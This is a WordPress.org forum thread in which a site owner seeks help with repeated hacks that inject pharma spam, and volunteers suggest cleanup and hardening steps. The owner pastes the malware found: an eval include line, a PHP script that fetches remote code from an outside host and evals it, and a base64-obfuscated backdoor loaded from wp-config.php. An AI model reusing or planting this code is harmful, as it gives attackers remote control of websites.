WordPress.org

Ready to get started?Download WordPress

Forums

WordPress Keeps Being Hacked! (26 posts)

  1. AmishPatel
    Member
    Posted 4 years ago #

    For some reason,

    my index.php in my root folder seems to keep getting compromised. I found last week that within the file there had been a link in there to a viagra file in the main directory. I fixed this, changed passwords, etc. and upgraded WP, but it has happened again! The following was in my index.php file

    eval(file_get_contents("/home/wrestlin/public_html/js/751b80d2ef316f0a050bbc2867bc028f"));

    the file in question was littered with viagra text.

    I have no spyware or anything like this on my machine, and the passwords are changed regularly. Only one other person has access to FTP, but surely it's not him and it shows ME as the owner of both of these files in terms of modifying etc.

    I have looked at the index.php file and it says modified 29/01/2010 and the viagra file in question was uploaded today.

    I don't know what to do. I've done anything I know in terms of security, passwords, etc. but it keeps happening, and it has also destroyed my search engine credibility.

  2. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    And when you're done:
    http://codex.wordpress.org/Hardening_WordPress
    Just in case you haven't read everything.

    Do you have access to server access logs? Look at the timestamp for your index.php file to see exactly what time it was altered.

    Compare that to your access logs to see where it was being altered from.

    Quite possible, someone has inserted a rogue file deep on your server somewhere that keeps allowing access to your files.

    thats what happened to me. I had 2 files, neither in my WP install....they were hidden good

  3. AmishPatel
    Member
    Posted 4 years ago #

    Hey,

    I followed the re-install and hardening instructions after the first attempt. I think I have access to server logs, I will see if they help!

    Thanks..

  4. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    I bet they will....I've seen this fix help many people. After you track down, and delete the rogue files...go through the process of changing passwords again. Maybe reinstall WP, also....reinstall all plugins, they can get dirty too. And your themes either reinstall or clean up.

  5. Samuel B
    moderator
    Posted 4 years ago #

    RVoodoo knows of what he speaks - do everything he has mentioned diligently

  6. starapple
    Member
    Posted 4 years ago #

    I've tried to block access to some IPs and .ru domains by .htaccess but this gets overwritten with each WP update or editing of permalinks. This seems an area to be addressed by the developers.

  7. Chris_K
    Member
    Posted 4 years ago #

    @starapple -- be sure you don't put your .htaccess tweaks between the # BEGIN WORDPRESS and # END WORDPRESS lines of the file.

  8. Jonas Grumby
    Member
    Posted 4 years ago #

    First of all, you should be running a firewall.

    WordPress Firewall SEO

    You also need: WP Security Scan

    and: WP-DBManager

  9. AmishPatel
    Member
    Posted 4 years ago #

    I will follow the above.

    Index.php was compromised again today...

    I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.

    Checking access logs.. I found the entry of the malicious file and it came from my IP so I'm not sure why thats the case - my machine is clean.

  10. AmishPatel
    Member
    Posted 4 years ago #

    Guys,

    I need help. I can't stop this! I have done everything that's been suggested and then some.

    My index.php's are no longer been compromised, but instead now, somehow my header.php is being edited with the following line being inserted at the top:

    <? eval(file_get_contents("/my directories/wp-content/751b80d2ef316f0a050bbc2867bc028f")); ?>

    It happened yesterday, but the file was placed in a different WordPress directory.

    Previous to that, these type of files were being placed in my directories at root level.

    We have checked FTP logs, but there is absolutely nothing. Myself and one other person has admin/FTP access. The other guy only has access to our WordPress folder and not root.

    There is nothing malicious on my machine I don't believe - I've done spyware tests etc.

    I dont know what to do, I cant stop this, and its happening everyday, and the script can seemingly be inserted into any directory on my server and any file can seemingly be edited to reflect where this is.

    I've changed passwords, made sure dirs are chmod correctly, deleted unwanted items etc. but I just can't stop this and its killing my Website and my search engine standings.

    Can someone please help or offer suggestions on anyone who could help? I can't do anymore on my end that I know of..

  11. AmishPatel
    Member
    Posted 4 years ago #

    Anybody?

  12. I have done everything that's been suggested and then some.

    We have checked FTP logs, but there is absolutely nothing. Myself and one other person has admin/FTP access. The other guy only has access to our WordPress folder and not root.

    I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.

    There is no easy fix, and did you really do what RVoodoo and Samboll said to do?

    Try this:

    Make a complete file and database copy of your blog and put that somewhere safe. Export your database to a WXR file and keep that in a safe place too.

    Take a deep breath. Now with those backups and WXR files preserved safely, DELETE YOUR WORDPRESS DATABASE AND ALL-OF-YOUR-FILES-AND-DIRECTORIES ON YOUR WEB SERVER THAT YOU BACKED UP.

    Bet that got your attention?

    Since this keeps coming back, you are not getting the infected files. Or the PC you are accessing this via really is compromised too. Once it's all deleted download fresh copies of everything from the source and do not touch your backup.

    Get WordPress running and import the WXR file into your new blank blog. Only use the file backup for jpegs, images, etc. that are referenced in your blog.

    If all that does not work, get a beer, relax for a while and then solicit help from jobs.wordpress.net for this problem.

    Good luck.

    Edit: Oh, and using a text editor, examine the WXR (don't modify it!) for any compromised links too. If the hack is in your export, then putting that back would be bad. Make sure it's clean too.

  13. Jonas Grumby
    Member
    Posted 4 years ago #

    Keep in mind that it might be the way your server is set up and could have nothing to do w/ WordPress. Maybe you should contact your hosting company tech support (unless that is you).

    So you set up the Firewall and followed all the suggestions in WP Security Scan, and you uploaded a fresh copy of all of the WP files and your config file? You can also use WP DB Manager to optimize and repair the database as well as to back it up, and you can use it to empty or drop tables from the database.

    I tried once to export a WP site's data and then import it but it didn't work very well at all. It imported the categories but not the content.

    Personally I would exhaust all support options before deleting the database. Deleting the files is no big deal. You can re-upload them any time. You can even upload them to a different domain or folder and then run two lines of code to make the database recognize the new URL.

    Another thing you could do rather than deleting your database is create a new one and modify your config file to point to it. Either way you would have to initialize the database to build the tables but you would still have a way to access your previous data. Aside from completely deleting the database you can also drop tables or just empty the tables. The advantage of the former is that you would not have to modify your config file and the advantage of the latter is that you also would not need to initialize the database. Just throwing all the options out there.

    If you're doing any of this on a small site your best bet might be to copy & paste your content back in w/ the editor in HTML mode. That way you could check for any wacky code in the content. You can save the code for each page in a text file and then put it back into your clean database.

    Try hosting support before trying any of this drastic stuff.

  14. AmishPatel
    Member
    Posted 4 years ago #

    Happened again.

    this time actual links were also inserted into footer.php. So thats header.php, footer.php, and index.php in root that have all been modified now.

    I have disabled FTP access completely to see if this stops the problem. I have gone through all the steps as advised apart from your suggestions jdembowski - bit scared to do that and really dont have time to now I've started a new job!

    I tried posting at wordpress jobs but it's really annoying me because my post won't go through properly - keeps saying my spam answer is wrong, when it's not. Tried a lot of times now.

    I've had it with this and don't know what to do anymore. Would anyone here be so kind as to take a look? I don't mind paying if it can be solved - I just have no time to deal with this anymore and I'm quite desperate.. it's also killing my search engine rank and traffic in general.

    I'll be forever greatful if someone can help out..

  15. AmishPatel
    Member
    Posted 4 years ago #

    Usually the hacked file just contains divs and viagra link, but this one today contained:

    <?
    
    $dir ='6845734';
    
    $pages = 'www.wrestling-edge.com
    
    www.wrestling-edge.com/mma-news
    
    www.wrestling-edge.com/mma-news/brock-lesnars-next-ufc-fight-against-shane-carwin-cancelled.html
    
    www.wrestling-edge.com/mma-news/chuck-liddell-and-mma-come-to-the-simpsons-this-sunday-night.html
    
    www.wrestling-edge.com/search/kelly+kelly+naked
    
    www.wrestling-edge.com/search/mickie+james+ass+pics
    
    www.wrestling-edge.com/site
    
    www.wrestling-edge.com/site/advertise
    
    www.wrestling-edge.com/wrestling-ppv-coverage
    
    www.wrestling-edge.com/wrestling-videos
    
    www.wrestling-edge.com/wwe-news/chyna-in-a-japan-hall-of-fame-update-on-mickies-country-music-more.html
    
    www.wrestling-edge.com/wwe-news/raw-going-to-three-hours-wrestlemania-2011-location-more.html
    
    www.wrestling-edge.com/wwe-news/spoiler-smackdown-elimination-chamber-match-revealed.html
    
    www.wrestling-edge.com/wwe-news/the-rock-hints-at-wwe-return-says-he-wants-to-do-more-than-guest-host-raw.html
    
    www.wrestling-edge.com/wwe-news/wwe-smackdown-vs-raw-2010-road-to-wrestlemania-storyline-info.html
    
    www.wrestling-edge.com/wwe-results/wwe-raw-results-october-5th-2009.html
    
    www.wrestling-edge.com/wwe-results/wwe-royal-rumble-2010-ppv-results.html
    
    ';
    
             @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
    
                $c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
    
    $pages=explode("\r\n",$pages);
    
    $url=trim(str_replace('www.','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
    
    $url=str_replace('/','',$url);
    
    foreach($pages as $page){
    
       $page=trim(str_replace('www.','',$page));
    
       if ($url==str_replace('/','',$page)){
    
          if(ini_get('allow_url_fopen')==1){
    
             @eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
    
          }
    
          else{
    
             if(function_exists('curl_init')){
    
                $ch = curl_init();
    
                $c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
    
                curl_setopt($ch, CURLOPT_URL, $c_url);
    
                curl_setopt($ch, CURLOPT_HEADER, 0);
    
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
                curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
                $data =  curl_exec($ch);
    
                @eval($data);
    
             }
    
          }
    
          break;
    
       }
    
    }
    
    ?>

    Weirdly, it still produced the same output on google's cache for the Website. The links in footer.php were just standard href tags to numerous viagra and the like sites.

  16. esmi
    Forum Moderator
    Posted 4 years ago #

  17. cdkrall
    Member
    Posted 4 years ago #

    Are you using Bad Behavior and Spam Karma?

  18. RangerPretzel
    Member
    Posted 4 years ago #

    Sounds to me like your server has a rootkit installed.

    Is this your server? or is this on a host provider?

  19. AmishPatel
    Member
    Posted 4 years ago #

    Not sure what a rootkit is..

    This is my dedicated server, hosted with gigenet.

    Not using bad behavior or spam karma.. but im guessing if the other plugins cant stop this, then they may be similar.

  20. AmishPatel
    Member
    Posted 4 years ago #

    Ok, not sure if i found the problem or not. I was looking in my wp-config.php file and found the following at the end, which was different to the normal template:

    /**
     * Retrieve the name of the highest priority template file that exists.
     *
     * Searches in the STYLESHEETPATH before TEMPLATEPATH so that themes which
     * inherit from a parent theme can just overload one file.
     *
     * @since 2.7.0 */
    include_once('wp-template.php');
    
    ?>

    I went to wp-template.php in my blog folder and it had the following crap:

    <?
    eval(gzinflate(base64_decode('tVXbbttGEH0PkH8gAgGkYI1kt3F6g4AErQIHSOOElvrSBMR4ORQ34u4Su0vRQuB/7ywp+dLElgK0eqCWM2fOmZtWg1zaaBq/+Pn56U8/Po9/e/pkUOOSXDSN4rZtx60l5yupl0D5ksbCqKdPvm2fKIWgqXV7AZNLa8QKKnIarWPTlYemEFDIZekBlyi18+BK1AQCbSs1f2lBVUX5uPSq2q8gyiYoyDznKECdQ3AxhMAb8CWBk6p2Rjt+kQ5co3PcgA4ZPC7hCK0oJyvm3Rz1T40ryvcFKClWko4+oyJ3hM4d1VI83ConPT3qnGC+Juulexh2a6rrNdfOeJ7sAfC1zMk8nFvb0q7JG43A00H4jDVqKJGbbQoouEho6hw9gdHQl+44hUZ7uwHVOClAGUuPt/pGyGILSxN83fAsEZSm4dXpg0ihlgg/HJ+cQGUEehlED6d3tZEVWXAKxSo3rQaqpJK6JxIlqkv2KvSiBEtrwr17eEMdNq1b9lJq7wA9BJcl31gNDjcOGNBi8HFpuenS5hK5mcuGablOfnD9B+qFw20ZaxdCQ2OOOQvMg8a9ljlv7IapiKdYmP0abG0q38sE5u07GOFN6NGpL1nt+JfvZDIbrMA26rKiPtmwsFvElircTNHu85LWWCUvC55atiSfCaM9cQ+TuPS+/nUyCR5ewIprZsWxEJN4POCbbhzzQeWnSXfJDYfDu6z8GYissVW4+76PiGl2F+eUrhieU/Lso/2on416a0AMmHrqrVSJ8zazVFcoKOlu2XgUx6NBdjFL/5qlf8dn8/n77Oz8Yh5/Gt9a09mHxexini3SN/Gn4Q3jPbJJz8T24C94mVCUyfZKRxf16X7pqu7OjybUN6nvkSyipNP7pmCP/LLrpiwSqWWYTRLznWDa0NasMDXpeDidntwi/59pXu8OVDm6q8WJFY0W4Yed0ZV0QUWE3DhdHw/v5dXtQ8nLcANI/sN9uUvTCTjyp ovYJS46i3xfp2/P3YdRvR1uRg2POZq/+mKWj6PjgiHQ2X6Tv5umrdxevQ6S3zeEpzt/8OTtfzEfRyVeCA/4DQG5OH0xXJELov1H9+DvsPdf1V8O85G1e9RC2Xf8D')));
    ?>

    Deleted the lines out of the config file and the template file, but still not sure if this will be enough, or if it was the backdoor in question..

  21. AmishPatel
    Member
    Posted 4 years ago #

    I am going to do another clean and sweep of the DB tonight, but in the mean time I'm stumped again.

    I have cleaned and gone over my site searching for traces of the keyword 'viagra' and 'base_64' run exploit scanner, checked config, settings, theme files etc. which is where the hacks usually are, and nothing. Also checked .htaccess and through files/folders for malicious files but no luck.

    However, this is the first time I've removed everything and google is STILL caching my website as a viagra site. See: http://www.google.co.uk/search?hl=en&source=hp&q=wrestling-edge&btnG=Google+Search&meta=&aq=f&oq=

    I even made the files that are constantly getting hacked, immutable.

    Does anyone have any clue? I can't see any clues in the source code of the cached viagra website either.

    I'm so sick of this.

  22. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    Have you ever found any php files tucked away deep, like in your uploads folder, or even somewhere else on your server? I mentioned looking for rogue files earlier in the thread...never really heard back from you on the result.

    This talks about how I cleaned my install:
    http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    And here is a different post I just made for someone specifically, but it goes a bit more in depth about using your access logs to find and delete php files that don't belong:
    http://www.rvoodoo.com/2010/03/using-access-logs-to-find-rogue-files-when-wordpress-is-hacked/

  23. AmishPatel
    Member
    Posted 4 years ago #

    Hi RVoodoo,

    I've checked all folders for trace of rogue files... I probably need to do it thoroughly again, but I deleted any thing suspicious or anything i didnt use. I pretty much deleted ANYTHING that was redundant on the Website..

    Access logs and error logs haven't really given me any information at all unfortunately.

    Can't believe how long this has gone on and it's really hurt my traffic.

  24. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    so...when your file was altered, and you checked the access logs for activity to the altered file at the exact time shown by the timestamp of the altered file, what did it show?

    Not the IP address, but the whole line, especially the second url/path that may be referenced at the end of the entry?

  25. henkholland
    Member
    Posted 4 years ago #

    Did you run this one on your local workstation and on the friends workstation?
    http://www.malwarebytes.org/

  26. AmishPatel
    Member
    Posted 4 years ago #

    henkholland - yes, our computers are malware free.

    RVoodoo.. generally these files magically appear on the server, but their last modified date is in the past. FTP logs show nothing apart from my IP editing a bunch of files. It has no useful information in there. Modified dates never match up against access_logs either.. it's hopeless. I've tried that method.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.